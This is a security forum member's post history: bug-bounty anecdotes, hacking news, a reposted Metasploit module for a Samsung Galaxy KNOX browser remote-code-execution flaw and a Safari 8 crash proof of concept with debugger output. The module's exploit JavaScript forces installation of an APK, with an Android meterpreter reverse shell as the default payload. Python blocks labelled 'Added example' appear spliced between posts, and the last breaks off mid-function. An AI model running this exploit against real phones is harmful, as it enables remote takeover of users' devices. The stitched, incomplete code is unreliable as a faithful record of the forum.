
akkiliON

Active Members
  • Content Count: 1086
  • Joined
  • Last visited
  • Days Won: 8

Everything posted by akkiliON

  1. Hello everyone, it has been a while since I last posted what I have found here. I found a reflected XSS in https://pay.google.com. Unfortunately, it only works on Internet Explorer 11, because that browser does not support CSP. The good part is that the vulnerability I found has been validated. That is about all I can say at the moment. All the best.
  2. English | ISBN-13: 978-1466592612 | 532 pages | PDF | 23 MB. In this book, web security expert Wu Hanqing reveals how hackers work and explains why companies of different scale require different security methodologies. With in-depth analysis of the reasons behind the choices, the book covers client script security, server application security, and Internet company security operations. It also includes coverage of browser security, cross-site scripting attacks, clickjacking, HTML5/PHP security, injection attacks, authentication, session management, access control, web framework security, DDoS, leaks, Internet transaction security, and the security development lifecycle. Link: Dropbox - Web Security: A WhiteHat Perspective
  3. Happy birthday @M2G !
  4. A friend of mine found a SQL injection and got a duplicate. I also reported an XSS (Flash), but to no avail. I got a duplicate.
  5. Congratulations, did they validate your issue?
  6. Even as Bitcoin is starting to shake things up in the US, all is not well in the cryptocurrency world. China-based Bitcoin exchange Bter was hacked on Valentine's Day and $1.75 million worth of Bitcoin was stolen. The company hasn't revealed much about the breach, except that 7,170 BTC was taken from its cold (offline) wallet on February 14 via a single transaction (link) and that the platform is suspending operations until further notice. The company has offered a bounty of 720 BTC, about $170,000, for the retrieval of the stolen currency. It says it will arrange withdrawals of unaffected funds at a later date. This is the second major Bitcoin hack in the past two months: Slovenian exchange Bitstamp lost about $5 million worth of currency in January but has since resumed service. More positively, Coinbase launched the first US Bitcoin exchange last month, ahead of the launch of Lunar, a competitor backed by the Winklevoss twins. It's likely that this year's debate around Bitcoin will center more on security than on whether businesses or individuals choose to adopt the currency. Source: $1.75 Million in Bitcoin Stolen from Chinese Exchange Bter
  7. akkiliON

    Yahoo XSS

    The request was made via the POST method.
  8. akkiliON

    Yahoo XSS

    I figured there was no point in creating another topic. I just want to say that I found a stored XSS in portal.office.com (Microsoft), which was exploitable. I was rewarded with $1500 plus a spot in the Hall of Fame. The vulnerability has been fixed.
  9. Microsoft has heavily criticized Google and its 90-day security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft's Windows 8.1 operating system, one after the other, just days before Microsoft planned to issue a patch for the bugs. But, seemingly, Google doesn't give a damn. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google's tight 90-day disclosure policy seems to be a good move for pushing software vendors to patch their products before they get exploited by hackers and cybercriminals. But at the same time, disclosing every critical bug along with its technical details in operating systems as widely used as Windows 7 and 8 doesn't appear to be the right decision either. In both cases, the only ones to suffer are innocent users. The revelation of the security flaw was also part of Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovery. This time the search giant has found a flaw in the CryptProtectMemory memory-encrypting function in Windows 7 and 8.1, present in both the 32- and 64-bit builds, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft confirmed the security issue on October 29 and said that its developers had managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, the next Patch Tuesday.
The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1 that was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which fails to run proper token checks. This is the third time in less than a month that Google's Project Zero has released details of a vulnerability in Microsoft's operating system under its 90-day public disclosure deadline policy. A few days ago, Google released details of a privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch it. Source: Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News
  10. akkiliON

    Yahoo XSS

    No, the issue isn't even fixed yet.
  11. akkiliON

    Yahoo XSS

    Vulnerability: stored cross-site scripting. Author: akkiliON. Reported and validated. It is exploitable, not a self-XSS. Proof:
  12. Download: 92.58 MB/s Upload: 92.66 MB/s ISP: RDS & RCS
  13. Shit happens. Take a look: https://hackerone.com/reports/12685
  14. Starting today and extending through the end of 2014, all Whitehat bugs in our ads code will receive double bounties. We recently completed a comprehensive security audit of this area ourselves. We found and fixed a number of security bugs but would like to encourage additional scrutiny from Whitehats to see what we might have missed. Also, since the vast majority of bug reports we work on with the Whitehat community are focused on the more common parts of Facebook code, we hope to encourage researchers to become more familiar with the surface area of ads to better protect the businesses that use them. Below are some tips for successfully finding bugs in ads code.
Here is a sampling of past Whitehat bugs in ads that we've fixed: redeeming the same ads coupon multiple times without expiry; retrieving the name of an unpublished Page via the Ads Create Tool by guessing its Page ID; arbitrary local file read via a .zip symlink (more details in this post); injecting JavaScript into an ads report email and then leveraging a CSRF bug to make a victim send a malicious email to a target on your behalf.
Ads can be organized into a few sections. UI - The UI is made up of our old and new Ads Manager tools (at /ads/manage/), as well as the JavaScript-based Power Editor tool that supports bulk ad edits and uploads. Most of the serious Whitehat bugs in this area have surfaced around permissions: viewing ads, or parts of an ad, that are not yours. Ads API (https://developers.facebook.com/docs/ads-api) - The documentation for this frequently used API is a good introduction to the components that describe ads: a user ID, a campaign, an account, a creative and so on. While not present in the ads API itself, the following writeup describes an excellent bug of the type that might be found there: Hacking Facebook's Legacy API, Part 1: Making Calls on Behalf of Any User.
Analytics, also called insights - Analytics is what measures the performance of an ad, how well the ads are performing, and so on. As with the UI, the bugs we've seen in this area with the largest impact have been missing or incorrect permissions checks. For example, we had an issue where someone could access insights for any application via a Graph API token with the read_insights permission. Everything else - There is a lot of backend code to correctly target, deliver, bill and measure ads. This code isn't directly reachable via the website, but the small number of issues found in these areas have been relatively high impact. At this stage of our bug bounty program, it's uncommon for us to see many of the common web security bugs like XSS. What we see more often are things like missing or incorrect permissions checks, insufficient rate-limiting that can lead to scraping, edge-case CSRF issues, and problems with SWFs. Ads-related code is the main part of Facebook that has and enforces roles, so it's also worthwhile to understand them: https://www.facebook.com/help/289207354498410. Among these roles, the permissions for reading or writing billing information are the most relevant. The best way to report an issue is to use your Whitehat test account: https://www.facebook.com/whitehat/accounts/. Good luck, and keep the submissions coming! Source: https://www.facebook.com/notes/protect-the-graph/doubling-up-on-ads-code-bounties/1519314984975314
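The read_insights issue described in the note above is an authorization check that tests only the token's scope and never the object being read. What follows is an added example, not Facebook's code or API: with constructed tokens, app IDs and numbers, it shows that scope-only check beside a corrected one that also requires the token's user to administer the requested app.

```python
# Added example (not Facebook's code): scope check versus object-level authorization,
# modelled on the read_insights bug described in the note above.
# All names, tokens and numbers below are constructed for illustration.
from dataclasses import dataclass
from typing import Dict, FrozenSet


class Forbidden(Exception):
    """Raised when a request fails an authorization check."""


@dataclass(frozen=True)
class Token:
    user_id: str
    scopes: FrozenSet[str]   # OAuth scopes granted to this token
    app_ids: FrozenSet[str]  # apps the token's user is allowed to administer


# Constructed sample data: two apps belonging to two different owners.
APP_INSIGHTS: Dict[str, Dict[str, int]] = {
    "app_100": {"impressions": 1200, "clicks": 37},
    "app_200": {"impressions": 9800, "clicks": 412},
}


def get_insights_vulnerable(token: Token, app_id: str) -> Dict[str, int]:
    """Checks only that the token carries read_insights.

    Any caller holding that scope can read insights for *any* app_id, which is
    the shape of the missing-permissions-check bug the bounty note describes.
    """
    if "read_insights" not in token.scopes:
        raise Forbidden("token lacks read_insights")
    return APP_INSIGHTS[app_id]


def get_insights_fixed(token: Token, app_id: str) -> Dict[str, int]:
    """Checks the scope AND that the token's user administers this app.

    An unknown app_id is rejected with the same error as an unauthorized one,
    so the endpoint cannot be used to probe which app IDs exist.
    """
    if "read_insights" not in token.scopes:
        raise Forbidden("token lacks read_insights")
    if app_id not in token.app_ids or app_id not in APP_INSIGHTS:
        raise Forbidden("token not authorized for this app")
    return APP_INSIGHTS[app_id]


def demo() -> Dict[str, bool]:
    """Runs both handlers with a token that administers only app_100."""
    token = Token("user_1", frozenset({"read_insights"}), frozenset({"app_100"}))
    results = {
        "vulnerable_leaks_other_app": False,
        "fixed_blocks_other_app": False,
        "fixed_allows_own_app": False,
    }
    try:
        get_insights_vulnerable(token, "app_200")  # other owner's data
        results["vulnerable_leaks_other_app"] = True
    except Forbidden:
        pass
    try:
        get_insights_fixed(token, "app_200")
    except Forbidden:
        results["fixed_blocks_other_app"] = True
    results["fixed_allows_own_app"] = (
        get_insights_fixed(token, "app_100") == APP_INSIGHTS["app_100"]
    )
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the fixed handler is that the scope answers "may this token read insights at all?" while the ownership check answers "may it read *these* insights?"; both questions have to be asked on every object-level read.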
  15. The challenge was nice. I'm waiting for the next one too.
  16. It has been posted. https://rstforums.com/forum/92177-samsung-galaxy-knox-android-browser-remote-code-execution.rst
  17. Only a few minutes have passed since I saw it on TV. Later edit: http://www.fbi.gov/wanted/cyber
  18. This Metasploit module exploits a vulnerability that exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, and Ace 4.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest/md5'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::BrowserExploitServer

  # Hash that maps payload ID -> (0|1) if an HTTP request has
  # been made to download a payload of that ID
  attr_reader :served_payloads

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Samsung Galaxy KNOX Android Browser RCE',
      'Description' => %q{
        A vulnerability exists in the KNOX security component of the Samsung
        Galaxy firmware that allows a remote webpage to install an APK with
        arbitrary permissions by abusing the 'smdm://' protocol handler
        registered by the KNOX component. The vulnerability has been confirmed
        in the Samsung Galaxy S4, S5, Note 3, and Ace 4.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'Andre Moulu', # discovery and advisory
        'joev'         # msf module
      ],
      'References'  => [
        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
        ['OSVDB', '114590']
      ],
      'Platform'    => 'android',
      'Arch'        => ARCH_DALVIK,
      'DefaultOptions' => {
        'PAYLOAD' => 'android/meterpreter/reverse_tcp'
      },
      'Targets'     => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Nov 12 2014',
      'DefaultTarget'  => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :os_name => OperatingSystems::Match::ANDROID
      }
    ))

    register_options([
      OptString.new('APK_VERSION', [ false, "The update version to advertise to the client", "1337" ])
    ], self.class)

    deregister_options('JsObfuscate')
  end

  def exploit
    # NOTE: the copy reproduced on this page is truncated here. The body of
    # #exploit and the beginning of #on_request_uri (the branches that serve
    # the APK and answer the _poll request) are missing, as are the apk_bytes
    # and launch_html helpers referenced below. The surviving fragment follows.
    @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
    elsif req.uri =~ /launch$/
      send_response_html(cli, launch_html)
    else
      super
    end
  end

  # The browser appears to be vulnerable, serve the exploit
  def on_request_exploit(cli, req, browser)
    print_status "Serving exploit..."
    send_response_html(cli, generate_html)
  end

  # Headers the KNOX updater expects on the APK it downloads
  def magic_headers
    {
      'Content-Length'         => apk_bytes.length,
      'ETag'                   => Digest::MD5.hexdigest(apk_bytes),
      'x-amz-meta-apk-version' => datastore['APK_VERSION']
    }
  end

  def generate_html
    %Q|
      <!doctype html>
      <html><body>
      <script>
      #{exploit_js}
      </script></body></html>
    |
  end

  def exploit_js
    payload_id = rand_word
    js_obfuscate %Q|
      function poll() {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
        xhr.onreadystatechange = function(){
          if (xhr.readyState == 4) {
            if (xhr.responseText == '1') {
              setTimeout(killEnrollment, 100);
            } else {
              setTimeout(poll, 1000);
              setTimeout(enroll, 0);
              setTimeout(enroll, 500);
            }
          }
        };
        xhr.onerror = function(){
          setTimeout(poll, 1000);
          setTimeout(enroll, 0);
        };
        xhr.send();
      }

      function enroll() {
        var loc = window.location.href.replace(/[/.]$/g, '');
        top.location = 'smdm://#{rand_word}?update_url='+
          encodeURIComponent(loc)+'/#{payload_id}.apk';
      }

      function killEnrollment() {
        top.location = "intent://#{rand_word}?program="+
          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
        setTimeout(launchApp, 300);
      }

      function launchApp() {
        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
      }

      enroll();
      setTimeout(poll,600);
    |
  end

  def rand_word
    Rex::Text.rand_text_alphanumeric(3+rand(12))
  end
end
```

Source: Samsung Galaxy KNOX Android Browser Remote Code Execution - Packet Storm
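From the defender's side, the page and APK response this module generates carry fixed indicators: an smdm:// URL with an update_url parameter, an intent URL whose scheme is smdm (the killEnrollment step), and the x-amz-meta-apk-version header on the served APK. The following is an added example, not part of the Metasploit module and not Samsung's code, that looks for those indicators in captured page bodies and response headers, as one would over proxy logs or a sandbox trace; the sample page, hostnames and header values are constructed, and the assumption that a legitimate KNOX update never arrives from an arbitrary web origin is this example's, not the page's.

```python
# Added example (not part of the Metasploit module above): detection of the
# indicators that module's generated page and APK response carry.
# Sample inputs below are constructed.
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlparse

# A remote page has no legitimate reason to hand the KNOX enrolment handler an
# update_url pointing at an arbitrary web server.
SMDM_URL_RE = re.compile(r"smdm://[^\s'\"<>]+", re.I)
# Android intent URL that re-triggers the smdm scheme (the killEnrollment step).
INTENT_SMDM_RE = re.compile(r"intent:[^\s'\"<>]*scheme=smdm[^\s'\"<>]*", re.I)
# Response header the module sets so the KNOX updater accepts the served APK.
APK_VERSION_HEADER = "x-amz-meta-apk-version"


def scan_page(body: str) -> List[Dict[str, str]]:
    """Returns one finding per smdm:// or intent-with-scheme=smdm reference."""
    findings: List[Dict[str, str]] = []
    for m in SMDM_URL_RE.finditer(body):
        url = m.group(0)
        qs = parse_qs(urlparse(url).query, keep_blank_values=True)
        if "update_url" in qs:
            # parse_qs already percent-decodes, so this yields the real APK host;
            # an empty value means the page builds the URL at runtime.
            host = urlparse(qs["update_url"][0]).hostname or "<dynamic>"
            findings.append({"indicator": "smdm_update_url", "match": url, "apk_host": host})
        else:
            findings.append({"indicator": "smdm_scheme", "match": url, "apk_host": ""})
    for m in INTENT_SMDM_RE.finditer(body):
        findings.append({"indicator": "intent_scheme_smdm", "match": m.group(0), "apk_host": ""})
    return findings


def is_suspicious_apk_response(headers: Dict[str, str], url: str) -> bool:
    """Flags an .apk download that advertises the KNOX update-version header.

    Assumption of this example (not from the page): legitimate KNOX updates do
    not come from arbitrary hosts, so this header on an APK served by an
    unexpected origin is worth an alert on its own.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    return url.lower().endswith(".apk") and APK_VERSION_HEADER in lowered


# Constructed sample: a page shaped like the module's output, and a benign page.
SAMPLE_PAGE = """<html><body><script>
top.location = 'smdm://a1b2c3?update_url=http%3A%2F%2Fupdates.example.invalid%2Fp%2Fx7.apk';
setTimeout(function(){ top.location = "intent://q9?program=q9/#Intent;scheme=smdm;end"; }, 300);
</script></body></html>"""
BENIGN_PAGE = '<html><body><a href="https://www.example.invalid/">ok</a></body></html>'
# Constructed headers in the shape magic_headers produces (ETag value is fake).
SAMPLE_HEADERS = {
    "Content-Length": "12345",
    "ETag": "0123456789abcdef0123456789abcdef",
    "x-amz-meta-apk-version": "1337",
}

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
    print(is_suspicious_apk_response(SAMPLE_HEADERS, "http://updates.example.invalid/p/x7.apk"))
```

In a pipeline, scan_page runs over response bodies served to Android user agents and is_suspicious_apk_response over APK downloads; either hit on its own is enough to pull the full session for review.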
  19. @w3bd3vil

```html
<!DOCTYPE html>
<head>
<style>
svg {
  padding-top: 1337%;
  box-sizing: border-box;
}
</style>
</head>
<body>
<svg viewBox="0 0 500 500" width="500" height="500">
  <polyline points="1 1,2 2"></polyline>
</svg>
</body>
</html>
<!--
Safari 8.0 / OSX 10.10

* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
    frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8ab10282:  jae    0x7fff8ab1028c            ; __pthread_kill + 20
   0x7fff8ab10284:  movq   %rax, %rdi
   0x7fff8ab10287:  jmp    0x7fff8ab0bca3            ; cerror_nocancel
   0x7fff8ab1028c:  retq
(lldb) register read
General Purpose Registers:
       rax = 0x0000000000000000
       rbx = 0x0000000000000006
       rcx = 0x00007fff5b761d98
       rdx = 0x0000000000000000
       rdi = 0x000000000000140f
       rsi = 0x0000000000000006
       rbp = 0x00007fff5b761dc0
       rsp = 0x00007fff5b761d98
        r8 = 0x0000000000000000
        r9 = 0x00000000000000a8
       r10 = 0x0000000008000000
       r11 = 0x0000000000000206
       r12 = 0x00007fff84b36487  "transform_is_valid(m)"
       r13 = 0x0000000108c2c000
       r14 = 0x00007fff747ae300  libsystem_pthread.dylib`_thread
       r15 = 0x00007fff84b36477  "Paths/CGPath.cc"
       rip = 0x00007fff8ab10282  libsystem_kernel.dylib`__pthread_kill + 10
    rflags = 0x0000000000000206
        cs = 0x0000000000000007
        fs = 0x0000000000000000
        gs = 0x0000000000000000
(lldb) bt
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
    frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
    frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
    frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
    frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
    frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
    frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
    frame #8: 0x00007fff8f47a2fa WebCore`WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
    frame #9: 0x00007fff8f47a633 WebCore`WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
    frame #10: 0x00007fff8eab4aeb WebCore`WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
    frame #11: 0x00007fff8eab477d WebCore`WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1325
    frame #12: 0x00007fff8ea2c3f2 WebCore`WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
    frame #13: 0x00007fff8ef300a8 WebCore`WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
    frame #14: 0x00007fff8e9b1e83 WebCore`WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
    frame #15: 0x00007fff8e9b1929 WebCore`WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
    frame #16: 0x00007fff8e9613c6 WebCore`WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
    frame #17: 0x00007fff8e95e9a3 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
    frame #18: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #19: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #20: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    frame #21: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    frame #22: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    frame #23: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #24: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #25: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    frame #26: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    frame #27: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    frame #28: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #29: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #30: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    frame #31: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    frame #32: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    frame #33: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #34: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #35: 0x00007fff8e95e8e2 WebCore`WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
    frame #36: 0x00007fff8e95e5b7 WebCore`WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
    frame #37: 0x00007fff8e95d252 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2386
    frame #38: 0x00007fff8e95c6e2 WebCore`WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
    frame #39: 0x00007fff8e95d392 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2706
    frame #40: 0x00007fff8e988376 WebCore`WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
    frame #41: 0x00007fff8f432baf WebCore`WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
    frame #42: 0x00007fff8ee86924 WebCore`WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
    frame #43: 0x00007fff8f3b2f59 WebCore`WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
    frame #44: 0x00007fff8f60f367 WebCore`WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
    frame #45: 0x00007fff8f6983fc WebCore`-[WebSimpleLayer drawInContext:] + 172
    frame #46: 0x00007fff85249355 QuartzCore`CABackingStoreUpdate_ + 3820
    frame #47: 0x00007fff85248463 QuartzCore`___ZN2CA5Layer8display_Ev_block_invoke + 59
    frame #48: 0x00007fff8524841f QuartzCore`x_blame_allocations + 81
    frame #49: 0x00007fff85247f1c QuartzCore`CA::Layer::display_() + 1546
    frame #50: 0x00007fff8f69831b WebCore`-[WebSimpleLayer display] + 43
    frame #51: 0x00007fff85247641 QuartzCore`CA::Layer::display_if_needed(CA::Transaction*) + 603
    frame #52: 0x00007fff85246d7d QuartzCore`CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
    frame #53: 0x00007fff8524650e QuartzCore`CA::Context::commit_transaction(CA::Transaction*) + 242
    frame #54: 0x00007fff85246164 QuartzCore`CA::Transaction::commit() + 390
    frame #55: 0x00007fff85256f55 QuartzCore`CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
    frame #56: 0x00007fff867e5d87 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
    frame #57: 0x00007fff867e5ce0 CoreFoundation`__CFRunLoopDoObservers + 368
    frame #58: 0x00007fff867d7858 CoreFoundation`CFRunLoopRunSpecific + 328
    frame #59: 0x00007fff8434943f HIToolbox`RunCurrentEventLoopInMode + 235
    frame #60: 0x00007fff843491ba HIToolbox`ReceiveNextEventCommon + 431
    frame #61: 0x00007fff84348ffb HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
    frame #62: 0x00007fff90583821 AppKit`_DPSNextEvent + 964
    frame #63: 0x00007fff90582fd0 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 194
    frame #64: 0x00007fff90576f73 AppKit`-[NSApplication run] + 594
    frame #65: 0x00007fff90562424 AppKit`NSApplicationMain + 1832
    frame #66: 0x00007fff8d881ef2 libxpc.dylib`_xpc_objc_main + 793
    frame #67: 0x00007fff8d883a9d libxpc.dylib`xpc_main + 490
    frame #68: 0x000000010449ab40 com.apple.WebKit.WebContent`___lldb_unnamed_function1$$com.apple.WebKit.WebContent + 16
    frame #69: 0x00007fff850755c9 libdyld.dylib`start + 1
    frame #70: 0x00007fff850755c9 libdyld.dylib`start + 1
(lldb)
-->
```

Source: Safari 8.0 / OS X 10.10 - Crash PoC
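For anyone triaging a report like the one above, the lldb output already answers the first questions: the process stopped on SIGABRT via __assert_rtn, the registers still hold the assertion expression (transform_is_valid(m)) and source file (Paths/CGPath.cc), and the first frame below the abort path is CGPathCreateMutableCopyByTransformingPath, reached from WebCore's SVG painting. The following is an added example, not part of the report, that pulls those facts out of lldb text with regular expressions; the excerpt it runs on is constructed from lines of the report above, and the classification rule (abort/__assert_rtn on the stack means a deliberate assertion abort rather than a memory-access fault) is this example's heuristic, not something the report states.

```python
# Added example (not part of the crash report above): a small lldb-output triage
# helper. Frame and register parsing is by regex only; the sample excerpt below is
# constructed from lines of the report.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

FRAME_RE = re.compile(r"frame #(\d+): 0x([0-9a-f]+) ([^`\s]+)`(.+?) \+ (\d+)\s*$", re.M)
STOP_RE = re.compile(r"stop reason = (.+?)\s*$", re.M)
# Registers lldb annotates with a C string literal, e.g. the expression and
# file name __assert_rtn received.
STRING_REG_RE = re.compile(r'^\s*(\w+) = 0x[0-9a-f]+\s+"([^"]*)"', re.M)
ABORT_PATH = {"__pthread_kill", "pthread_kill", "abort", "__assert_rtn"}
SOURCE_SUFFIXES = (".c", ".cc", ".cpp", ".m", ".mm")


@dataclass
class Frame:
    index: int
    address: int
    module: str
    symbol: str
    offset: int


@dataclass
class Triage:
    stop_reason: str
    frames: List[Frame]
    assertion_expr: Optional[str]
    assertion_file: Optional[str]
    faulting_frame: Optional[Frame]       # first frame that is not part of the abort path
    first_webcore_frame: Optional[Frame]  # where the browser engine handed off to CoreGraphics
    classification: str


def parse_frames(text: str) -> List[Frame]:
    seen: Dict[int, Frame] = {}
    for m in FRAME_RE.finditer(text):
        idx = int(m.group(1))
        if idx not in seen:  # lldb may print the selected frame more than once
            seen[idx] = Frame(idx, int(m.group(2), 16), m.group(3), m.group(4), int(m.group(5)))
    return [seen[i] for i in sorted(seen)]


def triage(text: str) -> Triage:
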